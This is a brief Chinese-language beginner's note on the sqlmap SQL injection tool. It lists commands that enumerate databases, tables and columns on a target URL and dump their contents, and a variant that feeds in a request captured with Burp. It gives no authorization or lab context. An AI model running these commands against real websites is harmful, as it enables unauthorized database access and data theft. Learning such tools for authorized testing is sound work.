sqlmap是世界上最好用的工具吗，对于萌新来说，是这样的，只要动动手指，就能避免那冗长复杂的手注代码，体验一波梭哈的快感，虽然有的时候会卡住出不来，有的时候会被安全人员玩弄，但是这仍然是世界上最好用的工具

sqlmap是出现在sqlmap: automatic SQL injection and database takeover tool的奇妙工具，负责…….，好，直接开始记录

1.直接链接传入
python sqlmap.py -u “url” –dbs （跑库名）

python sqlmap.py -u “url” -D 库名 –tables (跑表

python sqlmap.py -u “url” -D 库名 -T 表名 –columns (跑字段

python sqlmap.py -u “url” -D 库名 -T 表名 -C 字段名 –dump （跑内容

2.文本传入，当链接不显示sql注入点时，从bp抓包，将抓包内容复制到sqlmap根目录 txt里，在sqlmap里 跑

python sqlmap.py -r 1.txt –dbs（其实把u换成r就行

芜湖，剩下的慢慢补充